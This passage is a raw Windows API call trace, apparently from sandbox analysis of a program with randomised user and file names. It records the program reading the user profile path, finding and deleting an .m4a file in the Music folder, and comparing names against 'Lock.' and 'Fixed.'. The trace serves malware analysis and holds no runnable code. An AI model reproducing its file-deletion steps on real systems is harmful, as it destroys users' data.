0x248d8a0 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0253.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a", lpFilePart=0x8bedfc*="T3QpSK22qbSdU8p8YAX.m4a") returned 0x3b [0253.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0253.603] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\t3qpsk22qbsdu8p8yax.m4a")) returned 0x20 [0253.603] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b0faa0, ftCreationTime.dwHighDateTime=0x1d4ca0e, ftLastAccessTime.dwLowDateTime=0x95764540, ftLastAccessTime.dwHighDateTime=0x1d4cf4b, ftLastWriteTime.dwLowDateTime=0x95764540, ftLastWriteTime.dwHighDateTime=0x1d4cf4b, nFileSizeHigh=0x0, nFileSizeLow=0xe8b1, dwReserved0=0x13dd, dwReserved1=0x4, cFileName="T3QpSK22qbSdU8p8YAX.m4a", cAlternateFileName="T3QPSK~1.M4A")) returned 0xaa57a0 [0253.603] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\t3qpsk22qbsdu8p8yax.m4a")) returned 1 [0253.604] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b0faa0, ftCreationTime.dwHighDateTime=0x1d4ca0e, ftLastAccessTime.dwLowDateTime=0x95764540, ftLastAccessTime.dwHighDateTime=0x1d4cf4b, ftLastWriteTime.dwLowDateTime=0x95764540, ftLastWriteTime.dwHighDateTime=0x1d4cf4b, nFileSizeHigh=0x0, nFileSizeLow=0xe8b1, dwReserved0=0x13dd, dwReserved1=0x4, cFileName="T3QpSK22qbSdU8p8YAX.m4a", cAlternateFileName="T3QPSK~1.M4A")) returned 0 [0253.604] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0253.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.605] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0253.606] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0253.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.606] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0253.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0253.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0253.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0253.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a", lpFilePart=0x8bf658*="T3QpSK22qbSdU8p8YAX.m4a") returned 0x3b [0253.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0253.609] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\t3qpsk22qbsdu8p8yax.m4a")) returned 0xffffffff [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.610] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0253.610] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.610] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvGsoQYq1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vGsoQYq1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GsoQYq1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="soQYq1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oQYq1", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.612] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvGsoQYq1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vGsoQYq1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GsoQYq1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="soQYq1", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.613] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0253.613] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0253.613] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0253.613] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0253.614] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0253.614] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0253.614] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.614] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0253.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.615] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0253.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.615] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.615] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3242ba0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x7ad8f430, ftLastAccessTime.dwHighDateTime=0x1d4d040, ftLastWriteTime.dwLowDateTime=0x7ad8f430, ftLastWriteTime.dwHighDateTime=0x1d4d040, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x200530, dwReserved1=0xe58d, cFileName="VvGsoQYq1", cAlternateFileName="VVGSOQ~1")) returned 0xaa57a0 [0253.615] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.616] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0253.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 